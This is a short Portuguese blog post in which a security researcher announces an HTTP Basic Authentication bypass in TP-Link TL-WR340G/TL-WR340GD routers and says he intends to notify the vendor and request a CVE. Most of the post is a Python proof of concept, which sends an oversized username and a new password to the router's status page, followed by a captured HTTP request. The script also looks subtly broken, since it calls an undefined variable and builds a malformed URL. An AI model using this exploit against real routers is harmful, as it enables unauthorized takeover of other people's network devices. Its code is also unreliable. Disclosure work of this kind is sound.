Ontem descobri uma falha HTTP Basic Authentication no TL-WR340G/TL-WR340GD, especificamente no TL-WR340G e vou mandar para para o vendor e depois para CVE.
/*
* HTTP Basic Authentication Bypass
* Vuln: 54M Wireless Router
* Model No. TL-WR340G/TL-WR340GD
*
* Original Advisory:
* https://firebitsbr.wordpress.com
*
* Mauro Risonho de Paula Assumpção aka firebitsbr
* blog https://firebitsbr.wordpress.com
* twitter:https://twitter.com/firebitsbr
*/
—-
*=========PoC==========
#!/usr/bin/env python
import urllib2
IP_SERVER = ‘192.168.1.1’
USERNAME
= ‘aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’
NEW_PASS = ‘zoado’
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(‘LOGIN(default username & password is admin)’,
IP_SERVER, USERNAME, NEW_PASS);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
response = urllib2.urlopen(‘http://’+SERVER_IP_ADDRESS+’userRpm/StatusRpm.htm’)
/*=========RESPONSE==========
*GET http://192.168.1.1 HTTP/1.1
*Host: 192.168.1.1
*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 Iceweasel/9.0.1
*Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
*Accept-Language: en-us,en;q=0.5
*Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
*Proxy-Connection: keep-alive
*Referer: http://192.168.1.1/userRpm/StatusRpm.htm
*Authorization: Basic c3RyaWRlcjp0OXdSTm80Vg==
*Content-length: 0
*http://192.168.1.1/userRpm/StatusRpm.htm?Logout=Logout&Login=Login&ReleaseIP=Release&RenewIP=Renew&Connect=Connect&Disconnect=Disconnect&Refresh=Refresh
*/
@firebitsbr
VSLA - Virtual Security Labs Anywhere 